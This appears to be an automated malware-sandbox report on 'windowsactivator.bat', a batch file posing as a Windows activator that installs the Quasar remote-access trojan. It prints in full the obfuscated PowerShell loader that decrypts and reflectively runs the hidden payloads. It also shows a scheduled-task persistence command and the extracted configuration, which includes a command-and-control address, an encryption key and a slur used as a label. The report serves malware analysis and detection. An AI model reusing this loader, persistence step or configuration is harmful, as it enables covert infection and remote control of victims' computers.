Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
18-05-2024 03:50
Static task
static1
Behavioral task
behavioral1
Sample
windowsactivator.bat
Resource
win7-20240508-en
General
-
Target
windowsactivator.bat
-
Size
3.3MB
-
MD5
ad2205a76bbb0da48c8a9a08f719ab4a
-
SHA1
85e6141e85c8aa9fec30185e2c404e7b8eb04ecf
-
SHA256
fcbc5a9373b2ae956dc3457dfc1a420874b74e8eb2608a18b4af872d081dcdf5
-
SHA512
999da62f3b0ace84e19044671f74b68e65bb6e844ca01b466c201948e6251f98ba285a6c4a8e966de08bf3cf55f5d5cb5ac72dd111b1ce8374c8d198998448be
-
SSDEEP
49152:ieZhRUmd8UOahBXe2uA5l8QFsJPj93JFE/zQVsGEd9yMM:it
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
quasar
1.4.1
Niggger
2600:1700:b1e0:a330:b9ee:2632:e244:9a9:4782
2e7c6a16-860e-42fe-9feb-98d63fa4f025
-
encryption_key
D8AAEEC300C8107099917E1DA2F8BCD2181F4CE6
-
install_name
windowsactivator.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
windowsactivator
-
subdirectory
windowsactivator
Signatures
-
Quasar payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3012-14-0x0000020E7CF20000-0x0000020E7D394000-memory.dmp family_quasar behavioral2/memory/3012-17-0x0000020E7D430000-0x0000020E7D754000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\windowsactivator.exe family_quasar behavioral2/memory/3016-30-0x0000000000550000-0x0000000000874000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 3 IoCs
Processes:
windowsactivator.exewindowsactivator.exewindowsactivator.exepid process 3016 windowsactivator.exe 2300 windowsactivator.exe 644 windowsactivator.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 216 schtasks.exe 1580 schtasks.exe 4416 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3012 powershell.exe 3012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exewindowsactivator.exewindowsactivator.exewindowsactivator.exedescription pid process Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 3016 windowsactivator.exe Token: SeDebugPrivilege 2300 windowsactivator.exe Token: SeDebugPrivilege 644 windowsactivator.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
windowsactivator.exepid process 2300 windowsactivator.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exepowershell.exewindowsactivator.exewindowsactivator.exedescription pid process target process PID 1004 wrote to memory of 3012 1004 cmd.exe powershell.exe PID 1004 wrote to memory of 3012 1004 cmd.exe powershell.exe PID 3012 wrote to memory of 3016 3012 powershell.exe windowsactivator.exe PID 3012 wrote to memory of 3016 3012 powershell.exe windowsactivator.exe PID 3012 wrote to memory of 216 3012 powershell.exe schtasks.exe PID 3012 wrote to memory of 216 3012 powershell.exe schtasks.exe PID 3016 wrote to memory of 1580 3016 windowsactivator.exe schtasks.exe PID 3016 wrote to memory of 1580 3016 windowsactivator.exe schtasks.exe PID 3016 wrote to memory of 2300 3016 windowsactivator.exe windowsactivator.exe PID 3016 wrote to memory of 2300 3016 windowsactivator.exe windowsactivator.exe PID 3012 wrote to memory of 644 3012 powershell.exe windowsactivator.exe PID 3012 wrote to memory of 644 3012 powershell.exe windowsactivator.exe PID 2300 wrote to memory of 4416 2300 windowsactivator.exe schtasks.exe PID 2300 wrote to memory of 4416 2300 windowsactivator.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windowsactivator.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/m+uM7hqICRxp6Rj0SHeKQPPt+zvIT8gCSs7+jKku8M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cfQ3peVRUENpqFR1SQzgkQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tqQsK=New-Object System.IO.MemoryStream(,$param_var); $IcUTR=New-Object System.IO.MemoryStream; $HyFSs=New-Object System.IO.Compression.GZipStream($tqQsK, [IO.Compression.CompressionMode]::Decompress); $HyFSs.CopyTo($IcUTR); $HyFSs.Dispose(); $tqQsK.Dispose(); $IcUTR.Dispose(); $IcUTR.ToArray();}function execute_function($param_var,$param2_var){ $YyUtj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VPmsL=$YyUtj.EntryPoint; $VPmsL.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\windowsactivator.bat';$brVkN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\windowsactivator.bat').Split([Environment]::NewLine);foreach ($hBggO in $brVkN) { if ($hBggO.StartsWith(':: ')) { $kvrLw=$hBggO.Substring(3); break; }}$payloads_var=[string[]]$kvrLw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\windowsactivator.exe"C:\Users\Admin\AppData\Local\Temp\windowsactivator.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windowsactivator" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windowsactivator\windowsactivator.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1580 -
C:\Users\Admin\AppData\Roaming\windowsactivator\windowsactivator.exe"C:\Users\Admin\AppData\Roaming\windowsactivator\windowsactivator.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windowsactivator" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windowsactivator\windowsactivator.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:4416 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windowsactivator" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windowsactivator\windowsactivator.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:216 -
C:\Users\Admin\AppData\Roaming\windowsactivator\windowsactivator.exe"C:\Users\Admin\AppData\Roaming\windowsactivator\windowsactivator.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:644
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD55bb7e22ecc7d989a24478712a765a9a2
SHA15b6baa08eed2f0c697ddd11ff268c04407b78fdc
SHA25672983dfe6d0768f5a8dfffaacd4787a495987ee4f9a7cfe3448be836db7295ae
SHA512b8e4303d502b6e277be958565222db7189530ec7b6c82101fec6658ff4160410b79fcb84909a17c3e2e26ddde9879448a742b6ed68d907bb9773fbdb9913ab77
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b